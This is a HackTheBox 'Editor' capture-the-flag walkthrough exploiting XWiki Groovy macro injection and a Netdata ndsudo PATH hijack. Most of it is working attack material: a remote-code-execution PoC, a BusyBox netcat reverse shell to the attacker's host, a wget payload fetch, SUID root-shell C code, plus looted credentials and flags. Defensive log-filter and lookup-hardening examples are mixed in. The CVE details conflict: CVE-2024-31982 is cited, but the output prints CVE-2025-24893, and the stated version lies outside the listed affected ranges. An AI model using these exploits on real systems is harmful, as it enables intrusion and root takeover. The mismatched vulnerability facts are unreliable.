
HackTheBox | Editor


Welcome back to another HackTheBox machine walkthrough! This time we will solve the Editor machine, rated Easy. It offers an interesting combination of XWiki exploitation and privilege escalation through a Netdata SUID binary.

Let's start with a standard Nmap port scan to identify the running services:

└─# nmap -sCV -A -T5 10.10.11.80 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 02:06 EDT
Warning: 10.10.11.80 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.80
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http    Jetty 10.0.20
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-server-header: Jetty(10.0.20)
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan: 
|   Server Type: Jetty(10.0.20)
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT      ADDRESS
1   73.80 ms 10.10.14.1
2   71.26 ms 10.10.11.80

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.60 seconds

The scan reveals three open ports:

  • Port 8080/tcp: HTTP (Jetty 10.0.20) – running XWiki
  • Port 22/tcp: SSH (OpenSSH 8.9p1 Ubuntu)
  • Port 80/tcp: HTTP (nginx 1.18.0) – redirects to http://editor.htb/

Key findings from the scan:

  • The web server on port 80 redirects to editor.htb
  • Port 8080 hosts an XWiki instance whose robots.txt contains 50 disallowed entries

Web Application Analysis

Adding a hosts entry:

First, let's add the discovered domain to the hosts file:

Exploring the main website

Visiting http://editor.htb shows a download page. In the documentation quick links section we find a subdomain: http://wiki.editor.htb/xwiki/

Discovering XWiki

Accessing http://editor.htb:8080 reveals an XWiki installation running version 15.10.8. This version is vulnerable to CVE-2024-31982, a critical Remote Code Execution vulnerability.

Vulnerability Details

CVE-2024-31982 affects XWiki Platform and allows remote code execution through improper handling of user input in the search function.

Affected versions:

  • 2.4-milestone-1 up to, but not including, 14.10.20
  • 15.0-rc-1 up to, but not including, 15.5.4
  • 15.6-rc-1 up to, but not including, 15.10-rc-1

Patched versions:

  • 14.10.20
  • 15.5.4
  • 15.10-rc-1

References

Original exploit:

import sys
import requests
import argparse
import re
import urllib3
import urllib.parse
from requests.exceptions import RequestException

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

VULNERABLE_ENDPOINT = "/bin/get/Main/DatabaseSearch?outputSyntax=plain&space=&text="

def extract_description(text):
    pattern = r'<description>RSS feed for search on \}\}\}(.*?)</description>'
    matches = re.findall(pattern, text, re.DOTALL)
    
    if matches:
        return matches[0]
    else:
        print("No text found in the response.")
        return None

def make_request(url):
    try:
        response = requests.get(url, verify=False, timeout=50)  # Skip SSL verification for simplicity
        if response.status_code == 200:
            return response.text
        else:
            return None
    except RequestException:
        return None

def test_host(url, cmd):
    try:
        groovy_cmd = (
            "def sout = new StringBuilder(), serr = new StringBuilder(); "
            "def proc = '{cmd}'.execute(); proc.consumeProcessOutput(sout, serr); "
            "proc.waitForOrKill(1000); println \"$sout\";".format(cmd=cmd)
        )

        payload = '}}}{{async async=false}}{{groovy}}' + groovy_cmd + '{{/groovy}}{{/async}}'

        encoded_payload = urllib.parse.quote_plus(payload).replace('&gt;','<')

        fullurl = f"{url}{VULNERABLE_ENDPOINT}{encoded_payload}"
        body = make_request(fullurl)
        
        if body:
            extracted_text = extract_description(body)
            if extracted_text:
                print(extracted_text)
    except RequestException:
        print(f"Timeout: {url}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='POC for CVE-2024-31982: XWiki Platform Remote Code Execution.')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://target)')
    parser.add_argument('-c', '--cmd', required=True, help='Cmd to run')
    args = parser.parse_args()

    test_host(args.url, args.cmd)

We need to make a few changes to this payload, because it cannot be used as-is.

Fixed reverse shell code:

import sys
import requests
from html import unescape

def detect_protocol(domain):
    """Try HTTPS first, fall back to HTTP if it is not available."""
    https_url = f"https://{domain}"
    http_url = f"http://{domain}"

    try:
        response = requests.get(https_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] HTTPS tersedia: {https_url}")
            return https_url
    except requests.exceptions.RequestException:
        print("[!] HTTPS tidak tersedia. Beralih ke HTTP.")

    try:
        response = requests.get(http_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] HTTP tersedia: {http_url}")
            return http_url
    except requests.exceptions.RequestException:
        print("[✖] Tidak dapat mengakses target.")
        sys.exit(1)
    # Reached when the target answers but with an error status
    return None

def send_direct_revshell(target_url, lhost, lport):
    """Send the reverse shell payload through the Groovy RCE using BusyBox."""
    print(f"[+] Mengirim direct reverse shell via busybox ke {lhost}:{lport} ...")

    cmd = f"busybox nc {lhost} {lport} -e /bin/sh"
    encoded_cmd = cmd.replace('"', '\\"')

    # }}}{{async async=false}}{{groovy}}"<cmd>".execute(){{/groovy}}{{/async}}, URL-encoded
    payload_url = (
        f"{target_url}/bin/get/Main/SolrSearch?media=rss&text="
        f"%7D%7D%7D%7B%7Basync%20async=false%7D%7D"
        f"%7B%7Bgroovy%7D%7D\"{encoded_cmd}\".execute()%7B%7B/groovy%7D%7D"
        f"%7B%7B/async%7D%7D"
    )

    try:
        requests.get(payload_url, timeout=5)
    except requests.exceptions.RequestException:
        # The request blocks while the shell is connected, so a timeout is expected
        pass

if __name__ == "__main__":
    print("=" * 80)
    print("XWiki CVE-2024-31982 - Direct Reverse Shell via BusyBox")
    print("=" * 80)

    target = "editor.htb:8080/xwiki"
    lhost = "10.10.14.XX"  # Replace with your IP
    lport = "1336"

    target_url = detect_protocol(target)
    if target_url:
        send_direct_revshell(target_url, lhost, lport)
        print("[✔] Payload terkirim. Cek listener Anda (nc -lvnp 1336).")

We start the listener first:

nc -lvnp 1336

Then we run the exploit:

└─# python3 ex.py
================================================================================
XWiki CVE-2025-24893 - Direct Reverse Shell via BusyBox
================================================================================
[!] HTTPS not available. Falling back to HTTP.
[✔] HTTP available: http://editor.htb:8080/xwiki
[+] Sending direct reverse shell via busybox to 10.10.14.42:1336 ...

Here we drop straight into a shell.
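From the defender's side, the request that delivers this payload is easy to spot in the nginx or Jetty access log: a search endpoint whose text parameter, once decoded, contains wiki macros such as {{async}} and {{groovy}}. The following log filter is an added example, not part of the original writeup or of XWiki; the log lines are constructed, and the endpoint list and macro names come from the two PoCs above.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Search endpoints abused by both PoCs on this page (relative to the /xwiki context path).
SEARCH_ENDPOINTS = ("/bin/get/Main/SolrSearch", "/bin/get/Main/DatabaseSearch")
# Wiki-syntax macros that have no business inside a search term.
MACRO_RE = re.compile(r"\{\{/?(groovy|async|velocity|python)\b", re.IGNORECASE)
# Minimal nginx/Jetty combined-log parser: only the request line and status are needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def inspect_request(target):
    """Return the first injected macro found in a search request target, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(SEARCH_ENDPOINTS):
        return None
    for value in parse_qs(parts.query).get("text", []):
        # parse_qs already decoded once; decode again so a double-encoded payload is caught too.
        match = MACRO_RE.search(unquote_plus(value))
        if match:
            return match.group(0)
    return None

def scan_log(lines):
    """Return (line_no, macro, status, target) for every line that looks like exploitation."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m and (macro := inspect_request(m.group("target"))):
            hits.append((n, macro, int(m.group("status")), m.group("target")))
    return hits

# Constructed sample access-log lines (not from the target): a normal page view, a benign
# search, then the two injection shapes used above with a harmless println in place of a command.
SAMPLE_LOG = [
    '10.10.14.42 - - [03/Aug/2025:02:10:11 -0400] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5123',
    '10.10.14.42 - - [03/Aug/2025:02:10:30 -0400] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=editor HTTP/1.1" 200 812',
    '10.10.14.42 - - [03/Aug/2025:02:11:02 -0400] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dprintln(1)%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D HTTP/1.1" 200 640',
    '10.10.14.42 - - [03/Aug/2025:02:11:40 -0400] "GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&space=&text=%257D%257D%257D%257B%257Basync+async%253Dfalse%257D%257D%257B%257Bgroovy%257D%257Dprintln(1)%257B%257B/groovy%257D%257D%257B%257B/async%257D%257D HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for line_no, macro, status, target in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: macro {macro!r} (HTTP {status}) in {target[:60]}...")
```

A 200 status on a flagged line means the server rendered the macro; patching to one of the fixed versions listed above is the actual remedy, the filter only tells you whether it was tried.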

Post-Exploitation & User Flag

After gaining initial access, I explored the XWiki configuration files and found database credentials in /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml:

cat hibernate.cfg.xml | grep password
    <property name="hibernate.connection.password">theEd1t0rTe...</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.password"></property>

This reveals the password: theEd1t0rTe....

Escalating to a user

Here we have a password, which we can use to log in as the user oliver:

cd /home 
ls
oliver

Using the discovered credentials, I successfully switched to the user oliver:

oliver@editor:~$ ls
user.txt
oliver@editor:~$ cat user.txt 
710fd4c1d50316e6f919c2737c11d370
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

Privilege Escalation

I searched for SUID binaries, focusing on files related to Netdata:

oliver@editor:~$ find / -perm -4000 -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Key finding: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo has the SUID bit set.

Netdata ndsudo Vulnerability

The ndsudo binary is vulnerable to a path manipulation attack. Reference: GitHub Security Advisory

ls -l /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

Here we can see the SUID bit: the s means that when this file is executed, the process runs with the permissions of the file's owner, root, regardless of which user runs it. https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

Exploitation Strategy

Create a malicious binary: I wrote a C program that spawns a root shell:

// mega.c 
#include <unistd.h> 
#include <stdlib.h> 

int main() {
    setuid(0); 
    setgid(0); 
    execl("/bin/bash", "bash", "-i", NULL);
    return 0;
}

This C program sets the user ID and group ID of the running process to 0, making it root. execl then replaces the running process with another program, /bin/bash, which is started in interactive mode.

Compile the payload:

└─# gcc mega.c -o mega   

Set up the path manipulation:

mkdir -p ~/fakebin && wget -q http://10.10.xx.xx/mega -O ~/fakebin/megacli && chmod +x ~/fakebin/megacli && export PATH=~/fakebin:$PATH 

Run the exploit:

/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
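The root cause is that a setuid helper resolved its sub-commands through the caller's PATH, which is exactly what the export PATH=~/fakebin:$PATH step exploits. The block below is an added example and a hypothetical Python model of that lookup, not Netdata's code: it shows the PATH-following lookup next to a hardened one that only accepts helpers from a fixed list of non-world-writable directories, with the "megacli-disk-info" -> "megacli" mapping taken from this writeup and the trusted directory list assumed.

```python
import os
import shutil
import stat
import tempfile

# Hypothetical model, not Netdata's code: a fixed command name maps to a helper binary ("megacli-disk-info" -> "megacli", as in this writeup).
COMMANDS = {"megacli-disk-info": "megacli"}
TRUSTED_DIRS = ["/usr/sbin", "/usr/bin", "/sbin", "/bin"]  # assumed allowlist

def resolve_vulnerable(command, env_path):
    """Pre-fix: the helper is found through the caller's PATH, so a user-writable
    directory placed first in PATH (the ~/fakebin trick above) wins."""
    return shutil.which(COMMANDS[command], path=env_path)

def resolve_hardened(command, trusted_dirs=TRUSTED_DIRS):
    """Post-fix: ignore the caller's PATH; accept the helper only from a fixed list of
    non-world-writable directories, and only if the file itself is not group/world-writable."""
    for d in trusted_dirs:
        candidate = os.path.join(d, COMMANDS[command])
        try:
            dir_st, file_st = os.stat(d), os.stat(candidate)
        except FileNotFoundError:
            continue
        if dir_st.st_mode & stat.S_IWOTH or file_st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            continue
        if stat.S_ISREG(file_st.st_mode) and os.access(candidate, os.X_OK):
            return candidate
    return None

def demo():
    """Constructed throw-away tree (not the target host) comparing both lookups."""
    root = tempfile.mkdtemp()
    def mk(name, dir_mode):
        d = os.path.join(root, name)
        os.mkdir(d)
        os.chmod(d, dir_mode)
        p = os.path.join(d, "megacli")
        with open(p, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, 0o755)
        return d, p
    fakebin, fake = mk("fakebin", 0o755)   # attacker-controlled dir put first in PATH
    trusted, good = mk("trusted", 0o755)   # stands in for /usr/sbin
    shared, _ = mk("shared", 0o1777)       # world-writable, never trustworthy
    return {
        "vulnerable_follows_path": resolve_vulnerable("megacli-disk-info", fakebin + os.pathsep + trusted) == fake,
        "hardened_uses_trusted_dir": resolve_hardened("megacli-disk-info", [shared, trusted]) == good,
        "hardened_skips_world_writable": resolve_hardened("megacli-disk-info", [shared]) is None,
    }
```

On a real host the defensive equivalent is to upgrade Netdata to a release that ships the advisory's fix, or to drop the SUID bit from ndsudo if that collector is not needed.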

Root Access

The exploit successfully escalates privileges to root:

root@editor:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)
root@editor:/home/oliver# cat /root/root.txt
14ef87795c8cf922a870f9d8b2e28373
